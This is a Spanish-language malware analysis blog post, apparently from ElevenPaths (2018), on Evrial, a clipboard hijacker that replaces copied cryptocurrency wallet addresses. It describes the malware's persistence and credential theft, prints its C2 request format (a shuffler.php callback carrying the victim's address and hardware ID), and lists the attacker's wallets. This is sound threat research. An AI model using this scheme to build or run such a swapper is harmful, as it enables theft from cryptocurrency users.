Evrial, el malware que roba Bitcoins a través del portapapeles, y el estafador estafado

lunes, 26 de febrero de 2018

Evrial es el último malware que se vende en el mercado negro, diseñado para robar criptomonedas, y que se apodera del control del portapapeles para obtener "dinero fácil". ElevenPaths ha realizado un profundo estudio técnico sobre este malware, para mostrar su funcionamiento y detalles técnicos, con un vídeo auto-explicativo. Además, hemos seguido los pasos de su creador y algunos de sus compradores. Concluimos que además de crear el malware, se ha dedicado a estafar a los estafadores.

Qutra, el creador, vendiendo su malware imagen
Qutra, el creador, vendiendo su malware
Desde finales de 2017, teníamos Cryptoshuffle, un tipo de malware capaz de robar el portapapeles y modificar la dirección de ciertas criptomonedas en él. Pero, algo más tarde, alguien percibió el negocio en esto y comenzó a vender una plataforma a la que llamó "Evrial". A principios de 2018, Cryptoshuffle empezó a "desaparecer" y, Evrial, vio la luz (primera muestra encontrada) a mediados de enero. Se trata de un malware .NET capaz de robar contraseñas de los navegadores, clientes FTP, Pidgin y lo mejor de todo, capaz de modificar el portapapeles sobre la marcha y cambiar la dirección de una cartera de criptodivisas a otra a elección del atacante (comprador y usuario del malware). Por tanto, la característica más interesante es que el malware verifica el formato de aquello que esté en el portapapeles. Si la víctima copia, por ejemplo, la dirección de una cartera Bitcoin o Litecoin, ésta es rápidamente reemplazada por otra, sobre la marcha y dinámicamente (obteniendo la dirección destino de un servidor de control).

Tomando la dirección de un servidor y estableciéndola en el portapapeles imagen
Tomando la dirección de un servidor y estableciéndola en el portapapeles.
Evrial permite al atacante controlar el portapapeles desde un cómodo panel de control donde toda la información robada está disponible. Cuando el criminal interesado en Evrial compra la aplicación, puede establecer su "nombre" para identificarse en el panel (que estará incrustado en el código y, por tanto, la versión de Evrial será única y personalizada para el comprador).

Panel con el que el creador anunciaba su obra y con el que los compradores gestionan sus botines imagen
Panel con el que el creador anunciaba su obra y con el que los compradores gestionan sus botines

Por ejemplo, en un ordenador infectado, cada vez que una dirección de una cartera sea copiada al portapapeles, se realiza una petición a algún servidor remoto propiedad del atacante. Este es el formato:

[C2domian.com]/shuffler.php?type=BTC&user=ATACANTE&copy=[CualquierDirecciónDeCarteraCopiadaAlPortapapeles]&hwid=[IdentificadorÚnicoDeLaVictima]

Donde type puede ser BTC, LTC, ETH, XMR, WMR, WMZ o Steam. El servidor responderá con una dirección a elección del atacante.

¿Y esto para qué sirve?
Cuando se quiere realizar, por ejemplo, una transferencia en Bitcoins, normalmente el usuario copia y pega la dirección destino... si ésta se cambia "sobre la marcha" el atacante espera que, de forma inconsciente y fruto de la confianza ciega en el contenido del portapapeles, el usuario confirme la transacción. Pero en este caso irá a la dirección del atacante. Ahí radica el truco.

En este vídeo se muestra el funcionamiento de Evrial:



Y en este lo vemos de nuevo con más detalles técnicos:


Algunos datos curiosos
Hemos encontrado varias versiones del malware. Todas ellas están enmascaradas en un proceso que simula ser otro diferente en la descripción.

567.exe es el proceso monitorizando el portapapeles imagen
567.exe es el proceso monitorizando el portapapeles

Se ejecuta cada vez que el ordenador arranca (escondido en una llamada al registro a %appdata%). Está escrito en .NET donde algunas versiones incorporan un blindaje, que dificulta su análisis, aunque otras carecen de esta protección. El dominio C&C se obtiene de algún lugar de github cada vez que se ejecuta.

Dominio principal para el malware imagen
De momento, este es el dominio principal para el malware
Cualquier intento de copiar al portapapeles la misma dirección que devuelve el servidor (es decir, la que pertenece al atacante) hace que Evrial simplemente borre el contenido del portapapeles.

¿Quien está detras de Evrial?
El propio autor muestra su nombre de usuario de Telegram: @Qutrachka. Esta cuenta aparece en el propio código fuente para contactar con él. Usando esta información y algunas muestras analizadas, ha sido posible identificar varios usuarios que utilizando el nombre Qutra y cuyo  objetivo es vender este software malicioso.

Hemos encontrado, además, evidencias de que el malware Cryptoshuffle está conectado con el mismo autor. Por ejemplo, en una una publicación en pastebin donde se ofrece una explicación sobre las funcionalidades de esta familia publicada bajo el mismo nombre de usuario.

Días después de ponerlo a la venta, en nuestro seguimiento, hemos encontrado que algunos de los foros donde vendía su programa, el usuario Qutrachka ha sido "baneado". ¿Por qué?

Usuario Qutra baneado  imagen
El usuario Qutra baneado del foro donde solía intentar vender el malware

¿Los estafadores estafados?
Volviendo al malware, el campo "user" en las respuestas es bastante interesante. Hemos encontrado diferentes nombres en varias muestras que hemos analizado:

Itakeda, Plaka, depr103, onfrich, fr3d, ogus, xandrum, danildh, crypto368, knoxvile, hyipblock, fast63, spysdar, zheska, medols1, raff, desusenpai…

Esos corresponden también a usuarios en páginas relacionadas con Bitcoins o en foros de Steam (recordemos que el malware también roba las fórmulas de pago de esta plataforma).

Nicknames encontrados en el campo "user" del malware imagen
Nicknames encontrados en el campo "user" del malware
(por tanto, compradores potenciales) encontrados a su vez en foros relacionados con Bitcoins y Steam

Supuestamente, los atacantes que compraron el malware a Qutrachka, recibieron una compilación exclusiva de versión para ellos, donde el creador incrustó sus nombres. Da a entender que los "estafadores" debieron ajustar la dirección de la cartera que debía devolver el servidor a la suya, y comenzar a recoger beneficios por comprar el malware. Así es como se supone que debería ser, ¿no? Pero no es el caso, ¿recordáis esta URL?

[C2domian.com]/shuffler.php?type=BTC&user=ATACANTECOMPRADOR&copy=[CualquierDirecciónDeCarteraCopiadaAlPortapapeles]&hwid=[IdentificadorÚnicoDeLaVictima] <

El problema está en que, ahora mismo, da igual lo que insertes en el campo "user", siempre devuelve la misma dirección de criptodivisa, la que pertenece a Qutrachka y la original que aparece en las versiones más tempranas de este malware. Por tanto, nuestra teoría es: Qutrachka ha cambiado el servidor para que, ante cualquier petición realizada, devuelva la dirección de la cartera que él posee.  Así que, posiblemente, haya estafado a los estafadores.

¿Cuanto ha ganado hasta ahora?
Lo que hemos hecho ha sido modificar la cabecera con todos los códigos de criptodivisas posibles para, de esta forma, obtener todas las cuentas que pertenecen a los distintos tipos de dirección atacados.

[C2domian.com]/shuffler.php?type=BTC&user=ATACANTE&copy=[CualquierDirecciónDeCarteraCopiadaAlPortapapeles]&hwid=[IdentificadorÚnicoDeLaVictima]

Hemos solicitado los diferentes tipos cambiando a BTC, LTC, ETH, XMR, WMR, WMZ o Steam. Y los resultados han sido estos:
  • LTC: LiHcBT4ag4wGi4fDt5ScXuxvjKTcp9TeG2
  • BTC: 12MEp1W6EBdUEcmbhg4qJfaTB5bCNPtLHh
  • ETH: EO0x79ee1da747057c221680f94b7982ba4f3f05b822
  • XMR:4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nU  \\ MXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQp4nTDUPjYLQJVQKcA
  • WMR: R262605493266
  • WMZ: Z924876540636
Y ahora, vamos a analizar cuánto hay en cada cartera. Tras comprobar los sistemas de pago escogidos por el atacante, ha sido posible saber que ha recibido un total de 21 transacciones en su cartera de Bitcoin, supuestamente de sus victimas, obteniendo aproximadamente 0.122 BTC. Observamos que si bien las carteras de los ataques ransomware normalmente reciben la misma cantidad de sus víctimas, en este caso, el rango es más amplio y los pagos son todos diferentes.

Bitcoins obtenidos hasta finales de febrero imagen
Bitcoins obtenidos hasta finales de febrero

El atacante ha movido todo el dinero a otras direcciones para intentar confundir el rastro de sus pagos. A esto hay que sumar también que el atacante ha recibido 0.0131 LTC en su cuenta de Litecoins, y que esa cantidad sigue aún disponible. Por otro lado, no ha sido posible trastear pagos relacionados con su cuenta en Monero, ni tampoco los posibles pagos recibidos en sus carteras Webmoney (WMR y WMZ). Tampoco tenemos datos sobre su cuenta de Ethereum.

Innovation and laboratory
innovationlab@11paths.com

Miguel Ángel de Castro Simón
Senior Cybersecurity Analyst at ElevenPaths
miguelangel.decastro@telefonica.com

No hay comentarios:

Publicar un comentario